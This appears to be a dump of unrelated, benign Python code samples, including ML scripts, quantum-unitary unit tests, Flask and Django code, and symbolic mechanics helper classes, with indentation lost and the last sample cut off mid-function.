# MAGIC %load_ext autoreload
# MAGIC %autoreload 2
# COMMAND ----------
from daipeproject.test_modelu import print_hello
print_hello()
# COMMAND ----------
print_hello()
|
StarcoderdataPython
|
3366757
|
import pandas as pd
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--saveFile', type='str')
args = parser.parse_args()
with open('pred_engg1.txt') as f:
preds = f.readlines()
with open('../../dataset/dataToUse/UrIIICompSents/evaluate.sum') as f:
inps = f.readlines()
with open('../../dataset/dataToUse/UrIIICompSents/evaluate.eng') as f:
actual = f.readlines()
print(len(preds), len(inps), len(actual))
pd.DataFrame({'input':inps, 'actual':actual, 'preds':preds}).to_csv('./btPreds1.csv')
|
StarcoderdataPython
|
3341358
|
# coding: utf8
'''
This code is about the graph we build - edges and nodes (nodes are called Blocks)
<NAME>
March 3rd, 2016
Copyright Xerox 2016
'''
DEBUG=0
#DEBUG=1
# --- Edge CLASSE -----------------------------------------
class Edge:
def __init__(self, A, B):
"""
An edge from A to B
"""
self.A = A
self.B = B
def __str__(self):
n = 15 #show only the n leading characters of each node
if True:
return "Edge %s p%d-p%d %s --> %s" %(self.__class__, self.A.pnum, self.B.pnum, self.A.getText(n), self.B.getText(n))
else:
return "Edge %s p%d-p%d %s -->\n\t %s" %(self.__class__, self.A.pnum, self.B.pnum, self.A, self.B)
def revertDirection(self):
"""
revert the direction of the edge
"""
self.A, self.B = self.B, self.A
def computeOverlap(self):
"""
compute the overlap between the two nodes
return 0 or a positive number in case of overlap
"""
return 0
def computeOverlapPosition(self):
"""
compute the overlap between the two nodes and its position
relative to each node.
The overlap is a length
The position is a number in [-1, +1] relative to the center of a node.
-1 denote left or top, +1 denotes right or bottom.
The position is the position of the center of overlap.
return a tuple: (overlap, pos_on_A, pos_on_B)
"""
return 0, 0, 0
# ------------------------------------------------------------------------------------------------------------------------------------
#specific code for the CRF graph
def computeEdges(cls, lPrevPageEdgeBlk, lPageBlk, iGraphMode, bShortOnly=False):
"""
we will compute the edge between those nodes, some being on previous "page", some on "current" page.
if bShortOnly, we filter intra-page edge and keep only "short" ones
"""
from . import Block
lAllEdge = list()
#--- horizontal and vertical neighbors
lHEdge, lVEdge = Block.Block.findPageNeighborEdges(lPageBlk, bShortOnly, iGraphMode=iGraphMode)
lAllEdge.extend(lHEdge)
lAllEdge.extend(lVEdge)
if DEBUG:
cls.dbgStorePolyLine("neighbors", lHEdge)
cls.dbgStorePolyLine("neighbors", lVEdge)
#--- overlap with previous page
if lPrevPageEdgeBlk:
lConseqOverEdge = Block.Block.findConsecPageOverlapEdges(lPrevPageEdgeBlk, lPageBlk)
lAllEdge.extend(lConseqOverEdge)
return lAllEdge
computeEdges = classmethod(computeEdges)
def dbgStorePolyLine(cls, sAttr, lEdge):
"""
Store a polyline in the given attribute
"""
for e in lEdge:
xA, yA = e.A.getCenter()
xB, yB = e.B.getCenter()
ndA = e.A.node
sPolyLine = "%.1f,%.1f,%.1f,%.1f,%.1f,%.1f"%(xA,yA,xB,yB,xA,yA)
if ndA.hasProp(sAttr):
ndA.set(sAttr, ndA.prop(sAttr) + "," + sPolyLine)
else:
ndA.set(sAttr, sPolyLine)
return
dbgStorePolyLine = classmethod(dbgStorePolyLine)
# --- Edge SUB-CLASSES ------------------------------------
class SamePageEdge(Edge):
def __init__(self, A, B, length, overlap):
Edge.__init__(self, A, B)
self.length = length
self.overlap = overlap
self.iou = 0
class CrossPageEdge(Edge): pass
class CrossMirrorPageEdge(Edge): pass
class CrossMirrorContinuousPageVerticalEdge(Edge):
def __init__(self, A, B, length, overlap):
Edge.__init__(self, A, B)
self.length = length
self.overlap = overlap
self.iou = 0
class VirtualEdge(Edge): pass
# --- SamePageEdge SUB-CLASSES ----------------------------
class HorizontalEdge(SamePageEdge):
def __init__(self, A, B, length, overlap):
SamePageEdge.__init__(self, A, B, length, overlap)
try:
self.iou = max(0, self.overlap) / (abs(A.y2-A.y1) + abs(B.y2-B.y1) - abs(self.overlap))
except ZeroDivisionError:
self.iou = 0
def computeOverlap(self):
"""
compute the vertical overlap between the two nodes
return 0 or a positive number in case of overlap
"""
return max(0, min(self.A.y2, self.B.y2) - max(self.A.y1, self.B.y1))
def computeOverlapPosition(self):
"""
compute the vertical overlap between the two nodes and its position
relative to each node.
The overlap is a length
The position is a number in [-1, +1] relative to the center of a node.
-1 denote left or top, +1 denotes right or bottom.
The position is the position of the center of overlap.
return a tuple: (overlap, pos_on_A, pos_on_B)
"""
y1 = max(self.A.y1, self.B.y1)
y2 = min(self.A.y2, self.B.y2)
ovrl = max(0, y2 - y1)
if ovrl > 0:
m = (y1 + y2) / 2.0
pA = (m + m - self.A.y1 - self.A.y2) / abs(self.A.y2 - self.A.y1)
pB = (m + m - self.B.y1 - self.B.y2) / abs(self.B.y2 - self.B.y1)
return (m, pA, pB)
else:
return 0, 0, 0
class VerticalEdge(SamePageEdge):
def __init__(self, A, B, length, overlap):
SamePageEdge.__init__(self, A, B, length, overlap)
try:
self.iou = max(0, self.overlap) / (abs(A.x2-A.x1) + abs(B.x2-B.x1) - abs(self.overlap))
except ZeroDivisionError:
self.iou = 0
def computeOverlap(self):
"""
compute the horizontal overlap between the two nodes
return 0 or a positive number in case of overlap
"""
return max(0, min(self.A.x2, self.B.x2) - max(self.A.x1, self.B.x1))
def computeOverlapPosition(self):
"""
compute the horizontal overlap between the two nodes and its position
relative to each node.
The overlap is a length
The position is a number in [-1, +1] relative to the center of a node.
-1 denote left or top, +1 denotes right or bottom.
The position is the position of the center of overlap.
return a tuple: (overlap, pos_on_A, pos_on_B)
"""
x1 = max(self.A.x1, self.B.x1)
x2 = min(self.A.x2, self.B.x2)
ovrl = max(0, x2 - x1)
if ovrl > 0:
m = (x1 + x2) / 2.0
pA = (m + m - self.A.x1 - self.A.x2) / abs(self.A.x2 - self.A.x1)
pB = (m + m - self.B.x1 - self.B.x2) / abs(self.B.x2 - self.B.x1)
return (m, pA, pB)
else:
return 0, 0, 0
|
StarcoderdataPython
|
4814670
|
<gh_stars>1-10
'''
Tests for stoqcompiler.unitary modules.
'''
import pytest
import numpy as np
from stoqcompiler.unitary import (
Unitary,
UnitarySequence,
UnitarySequenceEntry,
UnitaryDefinitions,
ParameterizedUnitary,
ParameterizedUnitaryParameter,
ParameterizedUnitaryDefinitions)
class TestUnitary:
def test_default(self) -> None:
dimension = 4
unitary = Unitary(dimension)
assert unitary.get_dimension() == dimension
assert unitary.close_to(np.identity(dimension))
def test_non_square_matrix(self) -> None:
dimension = 2
with pytest.raises(Exception):
Unitary(dimension, np.array([[1, 0, 0], [0, 1, 0]]))
def test_non_unitary_matrix(self) -> None:
dimension = 2
with pytest.raises(Exception):
Unitary(dimension, np.array([[1, 0], [1, 1]]))
def test_mismatched_dimension(self) -> None:
dimension = 4
with pytest.raises(Exception):
Unitary(dimension, np.identity(dimension - 1))
def test_inverse_fixed(self) -> None:
dimension = 2
operation_name = 'U'
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
inverse = unitary.inverse()
assert unitary.left_multiply(inverse).close_to(np.identity(dimension))
assert unitary.right_multiply(inverse).close_to(np.identity(dimension))
assert inverse.get_display_name() == 'U†'
double_inverse = inverse.inverse()
assert double_inverse.get_display_name() == 'U'
assert unitary.close_to(double_inverse)
def test_inverse_random(self) -> None:
dimension = 2
unitary = Unitary.random(dimension)
inverse = unitary.inverse()
assert unitary.left_multiply(inverse).close_to(np.identity(dimension))
assert unitary.right_multiply(inverse).close_to(np.identity(dimension))
def test_tensor(self) -> None:
dimension = 2
unitary = Unitary(dimension)
tensor_product = unitary.tensor(unitary)
assert tensor_product.get_dimension() == dimension ** 2
assert tensor_product.close_to(np.identity(dimension ** 2))
tensor_product = UnitaryDefinitions.sigmax().tensor(
UnitaryDefinitions.sigmax())
assert tensor_product.get_dimension() == dimension ** 2
assert not tensor_product.close_to(np.identity(dimension ** 2))
tensor_product = tensor_product.left_multiply(tensor_product)
assert tensor_product.close_to(np.identity(dimension ** 2))
def test_multiply(self) -> None:
dimension = 2
identity = Unitary.identity(dimension)
product = Unitary(dimension)
product = product.left_multiply(UnitaryDefinitions.sigmax())
assert product.close_to(UnitaryDefinitions.sigmax())
product = product.right_multiply(UnitaryDefinitions.sigmay())
assert product.close_to(UnitaryDefinitions.sigmaz())
product = product.left_multiply(UnitaryDefinitions.sigmaz())
assert product.close_to(identity)
def test_definitions(self) -> None:
dimension = 2
identity_1q = Unitary.identity(dimension)
h = UnitaryDefinitions.h()
assert h.left_multiply(h).close_to(identity_1q)
t = UnitaryDefinitions.t()
assert t.left_multiply(t).left_multiply(t).left_multiply(t).close_to(
UnitaryDefinitions.sigmaz())
dimension = 8
identity_3q = Unitary.identity(dimension)
ccnot = UnitaryDefinitions.ccnot()
assert ccnot.left_multiply(ccnot).close_to(identity_3q)
qecc = UnitaryDefinitions.qecc_phase_flip()
assert qecc.left_multiply(qecc.inverse()).close_to(identity_3q)
def test_rphi(self) -> None:
theta_values = [
0, np.pi / 8, np.pi / 4, np.pi, 3 * np.pi / 2, -np.pi / 4]
for theta in theta_values:
assert UnitaryDefinitions.rphi(theta, 0).close_to(
UnitaryDefinitions.rx(theta))
assert UnitaryDefinitions.rphi(theta, np.pi / 2).close_to(
UnitaryDefinitions.ry(theta))
def test_display_name(self) -> None:
dimension = 2
operation_name = "Rx"
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
display_name_with_zero_parameters = unitary.get_display_name()
assert isinstance(display_name_with_zero_parameters, str)
assert operation_name == display_name_with_zero_parameters
parameter_name_1 = "abc"
unitary = Unitary(
dimension, unitary.get_matrix(), operation_name,
{parameter_name_1: (1.0, True)})
display_name_with_one_parameter = unitary.get_display_name()
assert isinstance(display_name_with_one_parameter, str)
assert operation_name in display_name_with_one_parameter
parameter_name_2 = "def"
unitary = Unitary(
dimension, unitary.get_matrix(), operation_name,
{parameter_name_1: (1.0, True), parameter_name_2: (2.0, False)})
display_name_with_two_parameters = unitary.get_display_name()
print(display_name_with_two_parameters)
assert isinstance(display_name_with_two_parameters, str)
assert operation_name in display_name_with_two_parameters
assert parameter_name_1 in display_name_with_two_parameters
assert parameter_name_2 in display_name_with_two_parameters
def test_qasm(self) -> None:
dimension = 2
operation_name = "Rcustom"
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
assert unitary.get_qasm() == operation_name + "\t" + "q[0];"
def test_jaqal(self) -> None:
dimension = 2
operation_name = "Rcustom"
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
assert unitary.get_jaqal() == operation_name + " q[0] "
def test_gms(self) -> None:
for num_qubits in [3, 4, 5]:
u = UnitaryDefinitions.gms(num_qubits)
assert (u.left_multiply(u).left_multiply(u).left_multiply(u)
.close_to(Unitary.identity(u.get_dimension())))
class TestParameterizedUnitary:
def test_parameterized_rotation(self) -> None:
dimension = 2
def rotation_matrix(
alpha: float,
beta: float,
gamma: float
) -> np.ndarray:
return np.array(
[[np.cos(beta / 2) * np.exp(-1j * (alpha + gamma) / 2),
-np.sin(beta / 2) * np.exp(-1j * (alpha - gamma) / 2)],
[np.sin(beta / 2) * np.exp(1j * (alpha - gamma) / 2),
np.cos(beta / 2) * np.exp(1j * (alpha + gamma) / 2)]])
min_value = 0
max_value = 2 * np.pi
parameters = [ParameterizedUnitaryParameter(
"alpha", min_value, max_value, is_angle=True),
ParameterizedUnitaryParameter(
"beta", min_value, max_value, is_angle=True),
ParameterizedUnitaryParameter(
"gamma", min_value, max_value, is_angle=True)]
operation_name = "R"
rotation = ParameterizedUnitary(
dimension, rotation_matrix, parameters, operation_name)
zero_rotation_unitary = rotation.as_unitary([0, 0, 0])
assert zero_rotation_unitary.close_to(Unitary.identity(dimension))
assert operation_name in zero_rotation_unitary.get_display_name()
assert [
p.get_parameter_name()
in zero_rotation_unitary.get_display_name()
for p in parameters]
random_values = [p.random_value() for p in parameters]
assert np.all([
parameters[i].is_valid(r)
for i, r in enumerate(random_values)])
random_rotation_unitary = rotation.as_unitary(random_values)
assert operation_name in random_rotation_unitary.get_display_name()
assert [
p.get_parameter_name()
in random_rotation_unitary.get_display_name()
for p in parameters]
assert random_rotation_unitary.left_multiply(
random_rotation_unitary.inverse()).close_to(
Unitary.identity(dimension))
def test_parameterized_unitary_classmethods(self) -> None:
rotation_xy = ParameterizedUnitaryDefinitions.rotation_xy()
zero_rotation_unitary = rotation_xy.as_unitary([0, 0])
assert zero_rotation_unitary.close_to(
Unitary.identity(rotation_xy.get_dimension()))
rotation_xyz = ParameterizedUnitaryDefinitions.rotation_xyz()
zero_rotation_unitary = rotation_xyz.as_unitary([0, 0, 0])
assert zero_rotation_unitary.close_to(
Unitary.identity(rotation_xyz.get_dimension()))
xx = ParameterizedUnitaryDefinitions.xx()
xx_angle = 2 * np.pi
full_rotation_unitary = xx.as_unitary([xx_angle])
assert full_rotation_unitary.close_to(
Unitary.identity(xx.get_dimension()))
angle_parameter_name = xx.get_parameters()[0].get_parameter_name()
assert (xx_angle, True) == full_rotation_unitary.get_parameter_value(
angle_parameter_name)
gms = ParameterizedUnitaryDefinitions.gms(num_qubits=2)
gms_angle = np.pi / 3
gms_unitary = gms.as_unitary([gms_angle])
assert gms_unitary.close_to(
ParameterizedUnitaryDefinitions.xx().as_unitary([gms_angle]))
angle_parameter_name = gms.get_parameters()[0].get_parameter_name()
assert (gms_angle, True) == gms_unitary.get_parameter_value(
angle_parameter_name)
def test_parameterized_unitary_time_evolution(self) -> None:
sigmax = np.array([[0, 1], [1, 0]])
t_min = -1.234
t_max = 1.234
time_evolution = ParameterizedUnitaryDefinitions.time_evolution(
sigmax, t_min, t_max)
zero_time_unitary = time_evolution.as_unitary([0])
assert zero_time_unitary.close_to(
Unitary.identity(time_evolution.get_dimension()))
evolution_time = t_max / 2.0
forward_time_unitary = time_evolution.as_unitary([evolution_time])
backward_time_unitary = time_evolution.as_unitary([-evolution_time])
assert forward_time_unitary.close_to(backward_time_unitary.inverse())
time_parameter_name = (time_evolution.get_parameters()[0]
.get_parameter_name())
assert (
(evolution_time, False)
== forward_time_unitary.get_parameter_value(time_parameter_name))
assert (
(-evolution_time, False)
== backward_time_unitary.get_parameter_value(time_parameter_name))
with pytest.raises(Exception):
# switch ordering of t_min and t_max
time_evolution = ParameterizedUnitaryDefinitions.time_evolution(
sigmax, t_max, t_min)
with pytest.raises(Exception):
# time outside valid range
time_evolution.as_unitary([2 * t_max])
class TestUnitarySequenceEntry:
def test_identity(self) -> None:
dimension = 2
entry = UnitarySequenceEntry(Unitary.identity(dimension), [0])
assert entry.get_dimension() == dimension
assert np.array_equal(entry.get_apply_to(), [0])
for system_dimension in [2, 4, 8, 16]:
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(Unitary.identity(system_dimension))
def test_cnot(self) -> None:
entry = UnitarySequenceEntry(UnitaryDefinitions.cnot(), [0, 1])
with pytest.raises(Exception):
system_dimension = 2
full_unitary = entry.get_full_unitary(system_dimension)
system_dimension = 4
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(UnitaryDefinitions.cnot())
system_dimension = 8
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(
UnitaryDefinitions.cnot().tensor(Unitary.identity(2)))
system_dimension = 16
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(
UnitaryDefinitions.cnot().tensor(Unitary.identity(4)))
assert full_unitary.left_multiply(full_unitary).close_to(
Unitary.identity(system_dimension))
def test_cnot_swapped(self) -> None:
dimension = 4
entry = UnitarySequenceEntry(UnitaryDefinitions.cnot(), [1, 0])
system_dimension = 4
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(Unitary(dimension, np.array(
[[1, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0],
[0, 1, 0, 0]])))
class TestUnitarySequence:
def test_default(self) -> None:
dimension = 2
sequence = UnitarySequence(dimension)
assert sequence.get_dimension() == dimension
assert sequence.product().close_to(np.identity(dimension))
def test_identity_roots_correct(self) -> None:
dimension = 2
t = Unitary(dimension, np.array([[1, 0], [0, np.exp(1j * np.pi / 4)]]))
t_entry = UnitarySequenceEntry(t, [0])
sequence = UnitarySequence(dimension, np.repeat(t_entry, 8))
assert sequence.get_dimension() == dimension
assert sequence.get_length() == 8
assert sequence.product().close_to(np.identity(dimension))
def test_identity_roots_incorrect(self) -> None:
dimension = 2
t = Unitary(dimension, np.array([[1, 0], [0, np.exp(1j * np.pi / 4)]]))
t_entry = UnitarySequenceEntry(t, [0])
sequence = UnitarySequence(dimension, np.repeat(t_entry, 7))
assert sequence.get_dimension() == dimension
assert sequence.get_length() == 7
assert not sequence.product().close_to(np.identity(dimension))
def test_append_and_remove(self) -> None:
dimension = 2
identity = Unitary.identity(dimension)
sequence = UnitarySequence(dimension)
assert sequence.get_length() == 0
assert sequence.product().close_to(identity)
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmax(), [0]))
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmax())
sequence.append_last(
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0]))
assert sequence.get_length() == 2
assert sequence.product().close_to(UnitaryDefinitions.sigmaz())
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmaz(), [0]))
assert sequence.get_length() == 3
assert sequence.product().close_to(identity)
sequence.remove_last()
assert sequence.get_length() == 2
assert sequence.product().close_to(UnitaryDefinitions.sigmay())
sequence.remove_first()
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmax())
sequence.remove_first()
assert sequence.get_length() == 0
assert sequence.product().close_to(identity)
def test_undo(self) -> None:
dimension = 2
identity = Unitary.identity(dimension)
sequence = UnitarySequence(dimension)
assert sequence.get_length() == 0
with pytest.raises(Exception):
sequence.undo()
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmax(), [0]))
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmax())
sequence.undo()
assert sequence.get_length() == 0
assert sequence.product().close_to(identity)
with pytest.raises(Exception):
sequence.undo()
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0]))
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0]))
assert sequence.get_length() == 2
assert sequence.product().close_to(identity)
sequence.remove_last()
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmay())
sequence.undo()
assert sequence.get_length() == 2
assert sequence.product().close_to(identity)
with pytest.raises(Exception):
sequence.undo()
def test_combine(self) -> None:
dimension = 2
t = Unitary(dimension, np.array([[1, 0], [0, np.exp(1j * np.pi / 4)]]))
t_entry = UnitarySequenceEntry(t, [0])
sequence_1 = UnitarySequence(
dimension, np.repeat(t_entry, 3))
sequence_2 = UnitarySequence(
dimension, [
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0])])
combined_sequence = UnitarySequence.combine(sequence_1, sequence_2)
assert (combined_sequence.get_length()
== sequence_1.get_length() + sequence_2.get_length())
assert combined_sequence.product().close_to(
sequence_1.product().left_multiply(sequence_2.product()))
def test_inverse(self) -> None:
dimension = 2
rx_entry = UnitarySequenceEntry(UnitaryDefinitions.rx(np.pi / 3), [0])
ry_entry = UnitarySequenceEntry(UnitaryDefinitions.ry(np.pi / 3), [0])
sequence = UnitarySequence(dimension, [rx_entry, ry_entry])
product = sequence.product()
inverse_sequence = sequence.inverse()
inverse_product = inverse_sequence.product()
assert inverse_product.close_to(product.inverse())
inverse_sequence.sequence_product = None
inverse_product = inverse_sequence.product()
assert inverse_product.close_to(product.inverse())
def test_sequence_output_formats(self) -> None:
dimension = 2
rx_entry = UnitarySequenceEntry(UnitaryDefinitions.rx(np.pi / 3), [0])
ry_entry = UnitarySequenceEntry(UnitaryDefinitions.ry(np.pi / 3), [0])
sequence = UnitarySequence(dimension, [rx_entry, ry_entry])
assert sequence.get_qasm()
assert sequence.get_jaqal()
assert sequence.get_display_output()
|
StarcoderdataPython
|
1711335
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField
from wtforms.validators import DataRequired, Length, Email
class FeedbackForm(FlaskForm):
name = StringField('Name *', validators=[DataRequired(), Length(min=0, max=50)])
email = StringField('Email *', validators=[DataRequired(), Email()])
subject = SelectField('Subject *',
choices=[('Saying hello', 'hello'), ('Question', 'Question'), ('Support', 'Support'),
('Feedback', 'Feedback'), ('A joke', 'A joke'), ('Enhancement', 'Enhancement'),
('Something else', 'Something else')], validators=[DataRequired()])
message = TextAreaField('Message *', validators=[DataRequired(), Length(min=0, max=500)])
submit = SubmitField('Say Hello')
def to_json(self):
"""
converts the form to a JSON
the csrt_token is not included in the response
:return: JSON representing the contents of the form
:rtype: JSON
"""
feedback_dict = {'name': self.name.data, 'email': self.email.data, 'subject': self.subject.data,
'message': self.message.data}
return feedback_dict
|
StarcoderdataPython
|
114588
|
'''
Created by auto_sdk on 2016.03.15
'''
from top.api.base import RestApi
class FenxiaoDistributorItemsGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.distributor_id = None
self.end_modified = None
self.page_no = None
self.page_size = None
self.product_id = None
self.start_modified = None
def getapiname(self):
return 'taobao.fenxiao.distributor.items.get'
|
StarcoderdataPython
|
144030
|
from .DBWorker import DatabaseWorker
from .models import Base
Base.metadata.create_all(DatabaseWorker.engine)
|
StarcoderdataPython
|
3351959
|
import numpy as np
import chainer
from chainer.cuda import get_array_module
from chainer.functions import convolution_2d, deconvolution_2d
from chainer.backends import cuda
from src.function.pooling import factor
if cuda.available:
def normalize(arr, axis):
norm = cuda.reduce('T x', 'T out',
'x * x', 'a + b', 'out = sqrt(a)', 0,
'norm_conv')(arr, axis=axis, keepdims=True)
cuda.elementwise('T norm',
'T x',
'x /= (norm + 1e-20)',
'div_conv_norm')(norm, arr)
return norm
else:
def normalize(arr, axis):
norm = np.sqrt((arr ** 2).sum(axis, keepdims=True))
arr /= norm + 1e-20
return norm
def conv_spectral_norm_exact(kernel, shape, stride, pad):
xp = get_array_module(kernel)
kernel = kernel.astype(xp.float64)
shape = (128,) + shape[1:]
x = xp.random.normal(size=shape).astype(xp.float64)
normalize(x, (1, 2, 3))
prev = None
eps = 1e20
with chainer.no_backprop_mode():
for i in range(5000):
x = convolution_2d(x, kernel, stride=stride, pad=pad).array
x = deconvolution_2d(x, kernel, stride=stride, pad=pad).array
norm = normalize(x, (1, 2, 3))
if prev is not None:
eps = norm - prev
prev = norm
f = xp.abs(eps) * np.prod(shape[1:])
error = (f + xp.sqrt(f * (4 * prev + f))) / 2
return xp.sqrt(xp.max(prev + error))
def conv_spectral_norm_improved(kernel, shape, stride, pad):
xp = get_array_module(kernel)
s, v, d = xp.linalg.svd(kernel.reshape(kernel.shape[0], -1))
return xp.max(v) * factor(shape, kernel.shape[2:], stride, pad)
def conv_spectral_norm_parseval(kernel, shape, stride, pad):
xp = get_array_module(kernel)
s, v, d = xp.linalg.svd(kernel.reshape(kernel.shape[0], -1))
factor = xp.sqrt(kernel.shape[2] * kernel.shape[3])
return xp.max(v) * factor
def conv_frobenius_norm(kernel, shape, stride, pad):
return (kernel ** 2).sum()
|
StarcoderdataPython
|
3372531
|
<gh_stars>1-10
from dataclasses import dataclass
from typing import Optional
from meeshkan.nlp.entity_extractor import EntityExtractor
from meeshkan.nlp.ids.gib_detect import GibberishDetector
from meeshkan.nlp.ids.id_classifier import IdClassifier, IdType
@dataclass(frozen=True)
class IdDesc:
value: Optional[str]
type: Optional[IdType] = None
@dataclass(frozen=True)
class PathItems:
entity: Optional[str]
id: Optional[IdDesc]
action: Optional[str] = None
group_id: Optional[IdDesc] = None
class PathAnalyzer:
def __init__(self, entity_extractor: EntityExtractor):
self._entity_extractor = entity_extractor
self._gib_detector = GibberishDetector()
self._id_classifier = IdClassifier()
def extract_values(self, path):
path_list = path.split("/")[1:]
entity_name = self._entity_extractor.get_entity_from_path(path_list)
entity_position = 0
for word in path_list:
if entity_name in word:
entity_position = path_list.index(word)
id_position, id_value, id_type = self._get_last_id(path_list)
if id_type is not None:
if id_position > entity_position:
return PathItems(
entity=entity_name, id=IdDesc(value=id_value, type=id_type),
)
else:
return PathItems(entity=entity_name, id=None)
else:
return PathItems(entity=entity_name, id=None,)
def _get_last_id(self, path_items):
for item in reversed(path_items):
id_type = self._id_classifier.by_value(item)
if id_type != IdType.UNKNOWN:
return path_items.index(item), item, id_type
return None, None, None
|
StarcoderdataPython
|
3341709
|
# Generated by Django 2.0.8 on 2019-01-23 02:44
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('conservation', '0005_auto_20190122_1638'),
]
operations = [
migrations.AddField(
model_name='managementaction',
name='document',
field=models.ForeignKey(blank=True, help_text='The document in which this management action is specified.', null=True, on_delete=django.db.models.deletion.SET_NULL, to='conservation.Document', verbose_name='Plan document'),
),
]
|
StarcoderdataPython
|
1645366
|
<reponame>khaledghobashy/asurt_mbdt
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 08:49:16 2019
@author: khaled.ghobashy
"""
# Standard library imports
import os
# 3rd party library imports
import cloudpickle
import sympy as sm
# Local applicataion imports
from ...symbolic.components import joints as joints
from ...symbolic.components import forces as forces
from ...symbolic.systems import topology_classes as topology_classes
from ...symbolic.systems import configuration_classes as cfg_cls
from ...symbolic.components.matrices import vector
###############################################################################
class abstract_decorator(object):
def __init__(self, sym_system):
self._sym_system = sym_system
self._decorate_items()
@property
def _items(self):
members = {i:getattr(self, i) for i in dir(self) if not i.startswith('_') and not i.startswith("__")}
return members
def _decorate_items(self):
for attr, obj in self._items.items():
setattr(self, attr, self._decorate(obj))
def _decorate(self, constructor):
raise NotImplementedError
class joints_container(abstract_decorator):
def __init__(self, topology):
self.spherical = joints.spherical
self.revolute = joints.revolute
self.universal = joints.universal
self.translational = joints.translational
self.cylinderical = joints.cylinderical
self.tripod = joints.tripod
self.fixed = joints.fixed
self.fixed_orientation = joints.fixed_orientation
self.inline = joints.inline
super().__init__(topology)
self._topology = self._sym_system
def _decorate(self, edge_component):
def decorated(*args, **kwargs):
self._topology.add_joint(edge_component, *args, **kwargs)
return decorated
class actuators_container(abstract_decorator):
def __init__(self, topology):
self.rotational_actuator = joints.rotational_actuator
self.absolute_locator = joints.absolute_locator
self.translational_actuator = joints.translational_actuator
self.absolute_rotator = joints.absolute_rotator
super().__init__(topology)
self._topology = self._sym_system
def _decorate(self, edge_component):
if issubclass(edge_component, joints.absolute_locator):
def decorated(*args, **kwargs):
self._topology.add_absolute_actuator(edge_component, *args, **kwargs)
elif issubclass(edge_component, joints.absolute_rotator):
def decorated(*args, **kwargs):
self._topology.add_absolute_actuator(edge_component, *args, **kwargs)
else:
def decorated(*args, **kwargs):
self._topology.add_joint_actuator(edge_component, *args, **kwargs)
return decorated
class forces_container(abstract_decorator):
def __init__(self, topology):
self.TSDA = forces.TSDA
self.local_force = forces.local_force
self.local_torque = forces.local_torque
self.generic_load = forces.generic_load
self.isotropic_bushing = forces.isotropic_bushing
self.generic_bushing = forces.generic_bushing
super().__init__(topology)
self._topology = self._sym_system
def _decorate(self, edge_component):
def decorated(*args, **kwargs):
self._topology.add_force(edge_component, *args, **kwargs)
return decorated
class geometries_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = 'gm'
self._symbolic_type = cfg_cls.Geometry
# Geometry Constructors
self.Composite_Geometry = cfg_cls.Composite_Geometry
self.Cylinder_Geometry = cfg_cls.Cylinder_Geometry
self.Triangular_Prism = cfg_cls.Triangular_Prism
self.Sphere_Geometry = cfg_cls.Sphere_Geometry
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args, mirror=False):
node = self._config.add_node(name, self._symbolic_type, self._sym, mirror)
self._config.add_relation(constructor, node, args, mirror)
return decorated
class scalar_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = ''
self._symbolic_type = sm.symbols
# Constructors
self.Equal_to = cfg_cls.Equal_to
self.UserInput = None
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args=None):
node = self._config.add_node(name, self._symbolic_type, self._sym)
if constructor:
self._config.add_relation(constructor, node, args)
return decorated
class vector_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = 'vc'
self._symbolic_type = vector
# Constructors
self.Mirrored = cfg_cls.Mirrored
self.Oriented = cfg_cls.Oriented
self.Equal_to = cfg_cls.Equal_to
self.UserInput = None
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args=None, mirror=False):
node = self._config.add_node(name, self._symbolic_type, self._sym, mirror)
if constructor:
self._config.add_relation(constructor, node, args, mirror)
return decorated
class points_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = 'hp'
self._symbolic_type = vector
# Constructors
self.Mirrored = cfg_cls.Mirrored
self.Centered = cfg_cls.Centered
self.Equal_to = cfg_cls.Equal_to
self.UserInput = None
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args=None, mirror=False):
node = self._config.add_node(name, self._symbolic_type, self._sym, mirror)
if constructor:
self._config.add_relation(constructor, node, args, mirror)
return decorated
class relations_methods(abstract_decorator):
def __init__(self, config_instance):
# Constructors
self.Mirrored = cfg_cls.Mirrored
self.Centered = cfg_cls.Centered
self.Oriented = cfg_cls.Oriented
self.Equal_to = cfg_cls.Equal_to
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
